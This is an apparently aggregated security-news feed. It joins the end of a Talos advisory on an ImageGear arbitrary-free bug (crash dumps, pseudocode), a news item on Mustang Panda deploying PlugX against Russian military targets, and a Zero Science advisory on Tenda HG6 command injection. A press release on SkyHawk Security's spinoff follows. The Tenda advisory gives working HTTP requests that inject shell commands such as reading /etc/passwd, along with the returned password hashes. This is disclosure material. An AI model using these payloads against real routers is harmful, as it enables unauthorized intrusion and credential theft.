    71928758 813abbbbcdab    cmp     dword ptr [edx],0ABCDBBBBh ds:002b:d0d0d0a0=????????
    

When looking at the call stack, we can observe the crash is happening during the free process as detailed below:

    STACK_TEXT:  
    0019f310 71928875     04d71000 d0d0d0c0 00000000 verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8
    0019f334 71928ae0     04d71000 d0d0d0c0 0019f3c4 verifier_71920000!AVrfpDphFindBusyMemory+0x15
    0019f350 7192aad0     04d71000 d0d0d0c0 04d70000 verifier_71920000!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
    0019f36c 7739f966     04d70000 01000002 d0d0d0c0 verifier_71920000!AVrfDebugPageHeapFree+0x90
    0019f3d4 77303d46     d0d0d0c0 3b0d5201 00000000 ntdll_772c0000!RtlDebugFreeHeap+0x3e
    0019f530 7734791d     00000000 d0d0d0c0 d0d0d0c0 ntdll_772c0000!RtlpFreeHeap+0xd6
    0019f58c 77303c16     00000000 00000000 00000000 ntdll_772c0000!RtlpFreeHeapInternal+0x783
    0019f5ac 7146dac2     04d70000 00000000 d0d0d0c0 ntdll_772c0000!RtlFreeHeap+0x46
    0019f5c0 71606b22     d0d0d0c0 00000000 09b60fa8 MSVCR110!free+0x1a
    0019f5d4 715ed0a3     00000000 0bd49ff0 98cbb32c igCore19d!IG_comm_is_comp_exist+0x4ad2
    0019f608 7164d641     0f83cfe0 00000000 0d0c4ff0 igCore19d!GPb_image_associate+0xd33
    0019f62c 7162a14e     0019fdb0 0b44aff8 00000000 igCore19d!IG_mpi_page_set+0x11611
    0019f64c 716dc57d     0019fc3c 0b44aff8 00000000 igCore19d!IG_cpm_profiles_reset+0xf03e
    0019f674 716e271b     0019fc3c 1000001f 1271f000 igCore19d!IG_mpi_page_set+0xa054d
    0019f708 716e0cc0     0019fc3c 1000001f 0afa2ff8 igCore19d!IG_mpi_page_set+0xa66eb
    0019fbb4 716113d9     0019fc3c 0afa2ff8 00000001 igCore19d!IG_mpi_page_set+0xa4c90
    0019fbec 716508d7     00000000 0afa2ff8 0019fc3c igCore19d!IG_image_savelist_get+0xb29
    0019fe68 71650239     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0019fe88 715e5757     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x14209
    0019fea8 00402219     0019ff10 0019febc 00000001 igCore19d!IG_load_file+0x47
    0019fec0 00402524     0019ff10 0019fef8 052e2f48 Fuzzme!fuzzme+0x19
    0019ff28 0040668d     00000005 052dcf78 052e2f48 Fuzzme!fuzzme+0x324
    0019ff70 7514fa29     00353000 7514fa10 0019ffdc Fuzzme!fuzzme+0x448d
    0019ff80 77327a9e     00353000 3b0d58ed 00000000 KERNEL32!BaseThreadInitThunk+0x19
    0019ffdc 77327a6e     ffffffff 77348a68 00000000 ntdll_772c0000!__RtlUserThreadStart+0x2f
    0019ffec 00000000     00406715 00353000 00000000 ntdll_772c0000!_RtlUserThreadStart+0x1b
    

Inspecting the argument indicates the parameter to free() is not a valid address: 0xd0d0d0c0.  
Tracing back through the call stack leads us to the function IGDIBRunEnds::delete_table_mys_rbg_ptr with the following pseudo code:

    LINE1  void __thiscall IGDIBRunEnds::delete_table_mys_rbg_ptr(IGDIBRunEnds *this,int pixpos,int some_buffer)
    LINE2  {
    LINE3    if (this->mys_RGB != (mys_RGB *)this->table_mys_rgb[pixpos]) {
    LINE4       operator_delete((mys_RGB *)this->table_mys_rgb[pixpos]);
    LINE5    }
    LINE6    if (some_buffer == 0) {
    LINE7       some_buffer = (int)this->mys_RGB;
    LINE8    }
    LINE9    this->table_mys_rgb[pixpos] = some_buffer;
    LINE10   this->field_0x48 = 1;
    LINE11   return;
    LINE12 }
    

The free is corresponding to the operator_delete called in LINE4, which is indexed by pixpos to delete a specific element.

When looking at how this is constructed, the table_mys_rgb object in this case lands in the following code:

    LINE13 void __thiscall IGDIBRunEnds::FUN_743f6aa0(IGDIBRunEnds *this)
    LINE14 {  
    LINE15   if (this->table_mys_rgb == (dword *)0x0) {
    LINE16     size_to_allocate = this->size_Y * 4;
    LINE17     buffer = (dword *)operator_new(-(uint)((int)(size_to_allocate >> 0x20) != 0) |
    LINE18                                    (uint)size_to_allocate);
    LINE19     if (this->table_mys_rgb != buffer) {
    LINE20       operator_delete(this->table_mys_rgb);
    LINE21       this->table_mys_rgb = buffer;
    LINE22     }
    LINE23     size_y = this->size_Y;
    LINE24     while (size_y != 0) {
    LINE25       size_y = size_y - 1;
    LINE26       this->table_mys_rgb[size_y] = (dword)this->mys_RGB;
    LINE27     }
    LINE28   }
    LINE29   return;
    LINE30 }
    

So we can see the allocation in LINE17, followed by a while loop between LINE24 and LINE27 to fill the memory allocated. Now the issue is happening when size_Y read from the file is null, thus the allocation of buffer becomes uncontrolled and a zero byte allocation is made in LINE17, returned by a malloc null operation. Thus the while loop (LINE24) is not processed and the flow continues without initializing any element in table_mys_rgb. When the thread reaches the function IGDIBRunEnds::delete_table_mys_rbg_ptr, even with a null pixpos value, the pointer at table_mys_rgb[0] (which is not initialized, since table_mys_rgb has a size of 0) is freed via operator_delete, possibly leading to an arbitrary free.

**Crash Information**

    0:000:x86> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    
    KEY_VALUES_STRING: 1
    
        Key  : AV.Fault
        Value: Read
    
        Key  : Analysis.CPU.mSec
        Value: 1905
    
        Key  : Analysis.DebugAnalysisManager
        Value: Create
    
        Key  : Analysis.Elapsed.mSec
        Value: 34355
    
        Key  : Analysis.Init.CPU.mSec
        Value: 5030
    
        Key  : Analysis.Init.Elapsed.mSec
        Value: 119236
    
        Key  : Analysis.Memory.CommitPeak.Mb
        Value: 123
    
        Key  : Timeline.OS.Boot.DeltaSec
        Value: 1162
    
        Key  : Timeline.Process.Start.DeltaSec
        Value: 84
    
        Key  : WER.OS.Branch
        Value: vb_release
    
        Key  : WER.OS.Timestamp
        Value: 2019-12-06T14:06:00Z
    
        Key  : WER.OS.Version
        Value: 10.0.19041.1
    
        Key  : WER.Process.Version
        Value: 1.0.1.1
    
    
    NTGLOBALFLAG:  2000000
    
    PROCESS_BAM_CURRENT_THROTTLED: 0
    
    PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APPLICATION_VERIFIER_LOADED: 1
    
    EXCEPTION_RECORD:  (.exr -1)
    ExceptionAddress: 71928758 (verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0x000000b8)
       ExceptionCode: c0000005 (Access violation)
      ExceptionFlags: 00000000
    NumberParameters: 2
       Parameter[0]: 00000000
       Parameter[1]: d0d0d0a0
    Attempt to read from address d0d0d0a0
    
    FAULTING_THREAD:  0000175c
    
    PROCESS_NAME:  Fuzzme.exe
    
    READ_ADDRESS:  d0d0d0a0 
    
    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    EXCEPTION_CODE_STR:  c0000005
    
    EXCEPTION_PARAMETER1:  00000000
    
    EXCEPTION_PARAMETER2:  d0d0d0a0
    
    STACK_TEXT:  
    0019f310 71928875     04d71000 d0d0d0c0 00000000 verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8
    0019f334 71928ae0     04d71000 d0d0d0c0 0019f3c4 verifier_71920000!AVrfpDphFindBusyMemory+0x15
    0019f350 7192aad0     04d71000 d0d0d0c0 04d70000 verifier_71920000!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
    0019f36c 7739f966     04d70000 01000002 d0d0d0c0 verifier_71920000!AVrfDebugPageHeapFree+0x90
    0019f3d4 77303d46     d0d0d0c0 3b0d5201 00000000 ntdll_772c0000!RtlDebugFreeHeap+0x3e
    0019f530 7734791d     00000000 d0d0d0c0 d0d0d0c0 ntdll_772c0000!RtlpFreeHeap+0xd6
    0019f58c 77303c16     00000000 00000000 00000000 ntdll_772c0000!RtlpFreeHeapInternal+0x783
    0019f5ac 7146dac2     04d70000 00000000 d0d0d0c0 ntdll_772c0000!RtlFreeHeap+0x46
    0019f5c0 71606b22     d0d0d0c0 00000000 09b60fa8 MSVCR110!free+0x1a
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0019f5d4 715ed0a3     00000000 0bd49ff0 98cbb32c igCore19d!IG_comm_is_comp_exist+0x4ad2
    0019f608 7164d641     0f83cfe0 00000000 0d0c4ff0 igCore19d!GPb_image_associate+0xd33
    0019f62c 7162a14e     0019fdb0 0b44aff8 00000000 igCore19d!IG_mpi_page_set+0x11611
    0019f64c 716dc57d     0019fc3c 0b44aff8 00000000 igCore19d!IG_cpm_profiles_reset+0xf03e
    0019f674 716e271b     0019fc3c 1000001f 1271f000 igCore19d!IG_mpi_page_set+0xa054d
    0019f708 716e0cc0     0019fc3c 1000001f 0afa2ff8 igCore19d!IG_mpi_page_set+0xa66eb
    0019fbb4 716113d9     0019fc3c 0afa2ff8 00000001 igCore19d!IG_mpi_page_set+0xa4c90
    0019fbec 716508d7     00000000 0afa2ff8 0019fc3c igCore19d!IG_image_savelist_get+0xb29
    0019fe68 71650239     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0019fe88 715e5757     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x14209
    0019fea8 00402219     0019ff10 0019febc 00000001 igCore19d!IG_load_file+0x47
    0019fec0 00402524     0019ff10 0019fef8 052e2f48 Fuzzme!fuzzme+0x19
    0019ff28 0040668d     00000005 052dcf78 052e2f48 Fuzzme!fuzzme+0x324
    0019ff70 7514fa29     00353000 7514fa10 0019ffdc Fuzzme!fuzzme+0x448d
    0019ff80 77327a9e     00353000 3b0d58ed 00000000 KERNEL32!BaseThreadInitThunk+0x19
    0019ffdc 77327a6e     ffffffff 77348a68 00000000 ntdll_772c0000!__RtlUserThreadStart+0x2f
    0019ffec 00000000     00406715 00353000 00000000 ntdll_772c0000!_RtlUserThreadStart+0x1b
    
    
    STACK_COMMAND:  ~0s ; .cxr ; kb
    
    SYMBOL_NAME:  verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+b8
    
    MODULE_NAME: verifier_71920000
    
    IMAGE_NAME:  verifier.dll
    
    FAILURE_BUCKET_ID:  INVALID_POINTER_READ_AVRF_c0000005_verifier.dll!AVrfpDphFindBusyMemoryNoCheck
    
    OS_VERSION:  10.0.19041.1
    
    BUILDLAB_STR:  vb_release
    
    OSPLATFORM_TYPE:  x64
    
    OSNAME:  Windows 10
    
    IMAGE_VERSION:  10.0.19041.1
    
    FAILURE_ID_HASH:  {bd57151c-e59f-3c94-75ca-6923d50e6d0d}
    
    Followup:     MachineOwner
    ---------
    

**Vendor Response**

Documentation Windows: http://help.accusoft.com/ImageGear/v20.0/Windows/DLL/webframe.html Linux: http://help.accusoft.com/ImageGear/v20.0/Linux/webframe.html

Download Links Windows: https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe Linux: https://download.accusoft.com/imagegear/pro/unix/ImageGear\_for\_C\_Cpp20.0.0-Linux64.tar.gz

https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe

**Timeline**

2022-01-26 - Vendor disclosure  
2022-04-29 - Vendor Patched  
2022-05-02 - Public Release  

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2022-22137: TALOS-2022-1449 || Cisco Talos Intelligence Group

Chinese state-sponsored actors have been caught red-handed trying to extract intelligence from Russians via a guard camp close to their border.
The post State-backed hacking group from China is targeting the Russian military appeared first on Malwarebytes Labs.

In an unexpected turn of events, research has surfaced about a Chinese APT (advanced persistent threat) group targeting the Russian military in recent cyberattacks.

Tracked as Bronze President, Mustang Panda, RedDelta, and TA416, the group has focused mainly on Southeast Asian targets—and more recently, European diplomats—and turned their attention towards Russia and started targeting the country’s military situated close to the Chinese border.

Dell SecureWorks retrieved a file named _Blagoveshchensk – Blagoveshchensk Border Detachment_, which bears the icon of a PDF file but is actually an executable file.

From the report:

> “Blagoveshchensk is a Russian city close to the China border and is home to the 56th Blagoveshchenskiy Red Banner Border Guard Detachment. This connection suggests that the filename was chosen to target officials or military personnel familiar with the region.”

Once the supposed document is “opened,” the executable downloads four files, including a clean document file used as a decoy (screenshot below), from a server Mustang Panda is known to use.

_Although the file name is aimed at Russian recipients, it throws one off when they see the decoy document written in English. (Source: Dell SecureWorks)_

The document appears like a formal report from the European Commission, and it details the refugee and migrant status pressuring countries bordering Belarus.

The three additional files are required for Mustang Panda to use DLL search order hijacking to install a variant of PlugX, an old remote access tool (RAT), onto target systems. This allows threat actors to secretly load a malicious DLL, thus avoiding detection from security solutions software.

PlugX is capable of stealing sensitive information from target machines. Although this, as a whole, is a benign attack that involves intelligence gathering, it is interesting to note the shifting targets, presumably based on the political situation in Europe and what’s happening in Ukraine. Suffice to say, China continues to look out for itself and its interests, even if it involves countries it considers “strategic partners of coordination”.

State-backed hacking group from China is targeting the Russian military

Tenda HG6 version 3.3.0 suffers from a remote command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands through the pingAddr and traceAddr HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

  
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Vendor: Tenda Technology Co.,Ltd.  
Product web page: https://www.tendacn.com  
                  https://www.tendacn.com/product/HG6.html  
Affected version: Firmware version: 3.3.0-210926  
                  Software version: v1.1.0  
                  Hardware Version: v1.0  
                  Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network  
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),  
a voice port to meet users' requirements for enjoying the Internet,  
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection  
vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters  
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2022-5706  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php

22.04.2022

--

ping.asp:  
---------

POST /boaform/formPing HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---  
TZ  
app.gwdt  
bftpd.conf  
buildtime  
check_version.txt  
config  
config.csv  
config_default.xml  
config_default_hs.xml  
dhclient-script  
dnsmasq.conf  
ethertypes  
factory_default.xml  
ftpdpassword  
group  
hardversion  
inetd.conf  
init.d  
inittab  
innversion  
insdrv.sh  
irf  
mdev.conf  
omci_custom_opt.conf  
omci_ignore_mib_tbl.conf  
omci_ignore_mib_tbl_10g.conf  
omci_mib.cfg  
orf  
passwd  
ppp  
profile  
protocols  
radvd.conf  
ramfs.img  
rc_boot_dsp  
rc_voip  
release_date  
resolv.conf  
rtk_tr142.sh  
run_customized_sdk.sh  
runoam.sh  
runomci.sh  
runsdk.sh  
samba  
scripts  
services  
setprmt_reject  
shells  
simplecfgservice.xml  
smb.conf  
softversion  
solar.conf  
solar.conf.in  
ssl_cert.pem  
ssl_key.pem  
version  
wscd.conf

ping6.asp:  
----------

POST /boaform/formPing6 HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---  
boa.conf  
web

tracert.asp:  
------------

POST /boaform/formTracert HTTP/1.1  
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---  
/home/httpd

tracert6.asp:  
-------------

POST /boaform/formTracert6 HTTP/1.1  
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh  
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh  
nobody:x:0:0::/tmp:/dev/null  
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

Tenda HG6 3.3.0 Remote Command Injection

Tiger Global Management invests $35 million in SkyHawk Security to accelerate growth.

**TEL AVIV, Israel, May 3, 2022—** Radware® (NASDAQ: RDWR), a leading provider of cyber security and application delivery solutions, today announced the spinoff of its Cloud Native Protector (CNP) business to form a new company called SkyHawk Security. To accelerate

SkyHawk Security’s development and growth opportunities, an affiliate of Tiger Global

Management will make a $35 million strategic external investment, resulting in a valuation of $180 million. Tiger Global Management is a leading global technology investment firm focused on private and public companies in the internet, software, and financial technology sectors.

Skyhawk Security is a leader in cloud threat detection and protects dozens of the world’s leading organizations using its artificial intelligence and machine learning technologies. Its Cloud Native Protector provides comprehensive protection for workloads and applications hosted in public cloud environments. It uses a multi-layered approach that covers the overall security posture of the cloud and threats to individual workloads. Easy-to-deploy, the agentless solution identifies and prevents compliance violations, cloud security misconfigurations, excessive permissions, and malicious activity in the cloud.

“We recognize the growing opportunities in the public cloud security market and are planning to capitalize on them,” said Roy Zisapel, Radware’s president and CEO. “We look forward to partnering with Tiger Global Management to scale the business, unlock even more security value for customers, and position SkyHawk Security for long-term success.”

The spinoff, which adds to Radware’s recently announced strategic cloud services initiative, further demonstrates the company’s ongoing commitment to innovation. SkyHawk Security will have the ability to operate with even greater sales, marketing, and product focus as well as speed and flexibility. Current and new CNP customers will benefit from future product development efforts, while CNP services for existing customers will continue without interruption.

Radware does not expect the deal to materially affect operating results for the second quarter or full year of 2022.

**About Tiger Global Management**

Tiger Global Management is a leading global technology investment firm that focuses on private and public companies in the software, internet, and financial technology sectors. Since 2001, Tiger Global has invested in hundreds of companies across more than 30 countries, including investments ranging from Series A to pre-IPO. The firm aims to partner with dynamic entrepreneurs operating market-leading companies in its core focus areas.

**About Radware**

Radware® (NASDAQ: RDWR) is a global leader of cyber security and application delivery solutions for physical, cloud, and software defined data centers. Its award-winning solutions portfolio secures the digital experience by providing infrastructure, application, and corporate IT protection, and availability services to enterprises globally. Radware’s solutions empower enterprise and carrier customers worldwide to adapt to market challenges quickly, maintain business continuity, and achieve maximum productivity while keeping costs down. For more information, please visit the Radware website.

Radware encourages you to join our community and follow us on: Facebook, LinkedIn, Radware Blog, Twitter, YouTube, and Radware Mobile for iOS and Android.

©2022 Radware Ltd. All rights reserved. Any Radware products and solutions mentioned in this press release are protected by trademarks, patents, and pending patent applications of Radware in the U.S. and other countries. For more details, please

see: https://www.radware.com/LegalNotice/. All other trademarks and names are property of their respective owners.

Radware believes the information in this document is accurate in all material respects as of its publication date. However, the information is provided without any express, statutory, or implied warranties and is subject to change without notice.

The contents of any website or hyperlinks mentioned in this press release are for informational purposes and the contents thereof are not part of this press release.

Tag

#intel